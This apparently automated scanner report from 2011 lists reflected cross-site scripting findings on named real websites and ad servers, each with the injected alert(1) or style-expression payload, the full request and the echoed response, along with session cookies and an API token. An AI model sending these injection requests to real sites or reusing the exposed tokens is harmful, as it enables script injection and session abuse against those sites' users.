The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 185ab"><script>alert(1)</script>eef67e67715 was submitted in the REST URL parameter 2. This input was echoed as 185ab\"><script>alert(1)</script>eef67e67715 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/video-jquerysub-explained185ab"><script>alert(1)</script>eef67e67715/ HTTP/1.1 Host: addyosmani.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 13:30:00 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.9 Vary: Cookie X-Pingback: http://addyosmani.com/blog/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Mon, 28 Feb 2011 13:30:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 19708
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o ...[SNIP]... <meta property="og:url" content="http://addyosmani.com/blog/video-jquerysub-explained185ab\"><script>alert(1)</script>eef67e67715/"/> ...[SNIP]...
3.2. http://addyosmani.com/blog/video-jquerysub-explained/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://addyosmani.com
Path:
/blog/video-jquerysub-explained/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e32e5"><script>alert(1)</script>3283f8d61a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e32e5\"><script>alert(1)</script>3283f8d61a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/video-jquerysub-explained/?e32e5"><script>alert(1)</script>3283f8d61a7=1 HTTP/1.1 Host: addyosmani.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the ctx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c30e"style%3d"x%3aexpression(alert(1))"e970888ab2f was submitted in the ctx parameter. This input was echoed as 5c30e"style="x:expression(alert(1))"e970888ab2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /AdServer/pvc.aspx?ctx=2P5NHNS4XIJO6-5JK1I9YRFLC-794ZA8LJ0UA05-794ZAAKK4W7C85c30e"style%3d"x%3aexpression(alert(1))"e970888ab2f HTTP/1.1 Host: ads.cpxadroit.com Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ALI20110228=1262-4-2544-36,2-5-130-97,8,24,1; PLI20110228=3392-4-1-8,8,24,1; SECPOP20110228=3392-3-1-72,8,24,1; CPX_3P=dlxdt=2/28/2011 8:24:20 AM; CPX=IG=1&VID=4ae8c3d0-29bc-4ccf-a280-cddde08d35bf&LS=4TI0ISSVP5SDA; CPXSEC=5JK3HMFKM39=794ZA8LJ0UA05,794ZAAKK4W7C8,2/28/2011 8:24:20 AM -05:00; CPX_IMP=2P5NHNS4XIJO6|5JK1I9YRFLC=794ZA8LJ0UA05,794ZAAKK4W7C8,2/28/2011 8:24:20 AM -05:00
The value of the r_num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b187'%3balert(1)//beb6c0fca6 was submitted in the r_num parameter. This input was echoed as 6b187';alert(1)//beb6c0fca6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /j?site_id=12169&pplacement_id=1&r_num=938774556b187'%3balert(1)//beb6c0fca6 HTTP/1.1 Host: ads1.revenue.net Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:13 GMT Server: Oversee Webserver v1.3.20 Vary: Accept-Encoding Cache-control: private, no-cache, must-revalidate Pragma: no-cache P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 26 Jul 1997 05:00:00 GMT Connection: close O_CREATIVE_ID: 227245 Set-Cookie: Train0=.CAC12OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo5Mzg3NzQ1NTZiMTg3JzthbGVydCgxKS8vYmViNmMwZmNhNjoxOjBEBwY5ODk0MjY1Mzp4CAc5ODg5OTQ1MzotKQQABzEyOTg4OTk0NTMRAAA=; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT Content-Type: text/html Content-Length: 358
The value of the site_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d0c0'%3balert(1)//3f75a430514 was submitted in the site_id parameter. This input was echoed as 9d0c0';alert(1)//3f75a430514 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /j?site_id=121699d0c0'%3balert(1)//3f75a430514&pplacement_id=1&r_num=93877455 HTTP/1.1 Host: ads1.revenue.net Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:13 GMT Server: Oversee Webserver v1.3.20 Vary: Accept-Encoding Cache-control: private, no-cache, must-revalidate Pragma: no-cache P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 26 Jul 1997 05:00:00 GMT Connection: close O_CREATIVE_ID: 227245 Set-Cookie: Train0=.CAC52OjE6MToxMjE2OTlkMGMwJzthbGVydCgxKS8vM2Y3NWE0MzA1MTQ6MjI3MjQ1OjM0NDA6OTM4Nzc0NTU6MTowSAcGOTg5NDI2NTM6fAgHOTg4OTk0NTM6LSkEAAcxMjk4ODk5NDUzEQAA; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT Content-Type: text/html Content-Length: 359
3.6. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserving.cpxinteractive.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c63fd"-alert(1)-"50fd2b01cf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=pop&ad_size=0x0§ion=1712140&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1&c63fd"-alert(1)-"50fd2b01cf1=1 HTTP/1.1 Host: adserving.cpxinteractive.com Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:30 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Mon, 28 Feb 2011 13:24:30 GMT Pragma: no-cache Content-Length: 4419 Age: 0 Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 0; rm_pop_times = 1; rm_pop_nofreqcap = 1; rm_pop_id = 1712140; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=29&c63fd"-alert(1)-"50fd2b01cf1=1&s=1712140&_salt=3559519841";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if( ...[SNIP]...
3.7. http://advertise.tucows.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://advertise.tucows.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5f30"-alert(1)-"ad7c7214e7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f5f30"-alert(1)-"ad7c7214e7c=1 HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:30:01 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=180d979498d64b5b166c42f709bb494f; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 180d979498d64b5b166c42f709bb494f=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 79305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <script> loggedIn = false;
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ba05e<script>alert(1)</script>3c9d273d885 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/v1/ip.json?token=efb6d514cdcaa8a88ed8190a5011fe9532325aa8&callback=dbase_parseba05e<script>alert(1)</script>3c9d273d885 HTTP/1.1 Host: api.demandbase.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54bbf"><script>alert(1)</script>05fe234b217 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT54bbf"><script>alert(1)</script>05fe234b217/WiredRTB/Magnetic_DigitalTV_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 373 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62ccd"><script>alert(1)</script>8039bdd084 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTB62ccd"><script>alert(1)</script>8039bdd084/Magnetic_DigitalTV_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 455 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d785"><script>alert(1)</script>568dee12a6c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTB/Magnetic_DigitalTV_SX_NonSecure@Bottom36d785"><script>alert(1)</script>568dee12a6c HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 365 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63282"><script>alert(1)</script>2c87a4f6b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT63282"><script>alert(1)</script>2c87a4f6b8/WiredRTB/Magnetic_Internet_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 372 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec351"><script>alert(1)</script>9177f754e13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTBec351"><script>alert(1)</script>9177f754e13/Magnetic_Internet_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 456 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62fa6"><script>alert(1)</script>4a633e43839 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTB/Magnetic_Internet_SX_NonSecure@Bottom362fa6"><script>alert(1)</script>4a633e43839 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 365 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b888"><script>alert(1)</script>410f0efdde5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT6b888"><script>alert(1)</script>410f0efdde5/WiredRTB/Magnetic_Phone_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 368 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4ac3"><script>alert(1)</script>5ea9ffc9c85 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTBe4ac3"><script>alert(1)</script>5ea9ffc9c85/Magnetic_Phone_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 453 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b380"><script>alert(1)</script>e8390eecd5a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTB/Magnetic_Phone_SX_NonSecure@Bottom34b380"><script>alert(1)</script>e8390eecd5a HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 362 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/
3.18. http://bg.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bg.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbe3a"><script>alert(1)</script>4e447eee499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?fbe3a"><script>alert(1)</script>4e447eee499=1 HTTP/1.1 Host: bg.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Mon, 28 Feb 2011 13:30:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "5183a95e1a38b3b6b7861cdde1b02a46" X-Runtime: 122 Content-Length: 20094 Set-Cookie: sfcsid=13eb1fb532654d23c12414d09dda95b2; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
3.19. http://blog.csdn.net/jiji262/archive/2007/07/28/1713771.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.csdn.net
Path:
/jiji262/archive/2007/07/28/1713771.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a20f3'style%3d'x%3aexpression(alert(1))'86f4c83a4c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a20f3'style='x:expression(alert(1))'86f4c83a4c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /jiji262/archive/2007/07/28/1713771.aspx?a20f3'style%3d'x%3aexpression(alert(1))'86f4c83a4c1=1 HTTP/1.1 Host: blog.csdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
